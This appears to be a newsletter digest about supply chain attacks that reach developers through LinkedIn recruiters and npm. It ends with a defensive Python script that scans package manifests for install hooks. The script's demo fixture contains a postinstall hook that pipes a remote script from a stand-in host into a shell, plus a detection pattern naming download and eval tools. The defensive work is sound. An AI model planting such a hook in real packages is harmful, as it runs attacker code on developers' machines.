Supply chain attacks still running through LinkedIn and npm
A thread about a backdoor discovered in a LinkedIn job offer got traction, with commenters quickly connecting it to a broader pattern: the axios maintainer was reportedly compromised the same way. The attack vector is the same in both cases. A fake or social-engineered recruiter sends a script or package to run as part of an interview or onboarding process, and the developer runs it without scrutiny.
The npm-scan supply chain security project on the front page adds another data point. Supply chain attacks are not slowing down, and LinkedIn has become a reliable delivery mechanism because developers trust it as a professional context. 'Downloading random unprotected scripts from the internet like it is 1995' is how one commenter put it.
The conversation around Mac virtualization came up too, with people noting that sandboxed environments should be the default for running any unknown code, but in practice most developers do not bother.
So what?
If you are a founder or maintainer with a public npm presence, you are a target. The LinkedIn vector is specifically about social engineering maintainers with credibility. Review your publish credentials, use hardware keys for npm auth, and set a firm policy in your team about running code sent by unknown parties, regardless of the professional context it arrives in.
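One concrete check that fits the policy above: before running a recruiter-sent "take-home" npm project, list every lifecycle hook that `npm install` would execute, including hooks in vendored dependencies. This is an added example, not code from the thread or from any project it mentions; the directory layout and the manifests are constructed, and the suspicious-pattern regex is a heuristic assumption.

```python
"""Added example: enumerate npm lifecycle hooks in an unpacked project before
installing it. Sample manifests below are constructed, not real packages."""
import json
import os
import re
import tempfile

# npm runs these script names automatically during `npm install`; a command here
# executes as shell code with the developer's privileges, without any prompt.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare", "prepublish")

# Assumed heuristic: hooks that fetch, decode or eval remote content deserve a look.
SUSPICIOUS = re.compile(r"curl|wget|base64|eval\(|child_process|https?://", re.I)


def find_lifecycle_hooks(root):
    """Walk `root` (node_modules included) and return one dict per lifecycle hook
    found in any package.json: manifest path, hook name, command, suspicious flag."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        if "package.json" not in files:
            continue
        path = os.path.join(dirpath, "package.json")
        try:
            with open(path, encoding="utf-8") as fh:
                scripts = json.load(fh).get("scripts") or {}
        except (OSError, ValueError):
            continue  # unreadable or malformed manifest: npm would not run it either
        for hook in LIFECYCLE_HOOKS:
            cmd = scripts.get(hook)
            if cmd:
                findings.append({"path": os.path.relpath(path, root), "hook": hook,
                                 "command": cmd, "suspicious": bool(SUSPICIOUS.search(cmd))})
    return findings


def demo():
    """Constructed take-home project: a clean root manifest plus one vendored
    dependency whose postinstall pipes a remote script into a shell."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "node_modules", "dep"))
    with open(os.path.join(root, "package.json"), "w", encoding="utf-8") as fh:
        json.dump({"name": "take-home", "scripts": {"test": "jest"}}, fh)
    with open(os.path.join(root, "node_modules", "dep", "package.json"), "w", encoding="utf-8") as fh:
        json.dump({"name": "dep", "scripts": {"postinstall": "curl -s https://example.invalid/setup.sh | sh"}}, fh)
    return find_lifecycle_hooks(root)


if __name__ == "__main__":
    for f in demo():
        print(("SUSPICIOUS" if f["suspicious"] else "hook      "), f["path"], f["hook"], "->", f["command"])
```

Running `npm install --ignore-scripts` skips these hooks entirely, which is the safe default for anything that arrives through a recruiter rather than through your own lockfile.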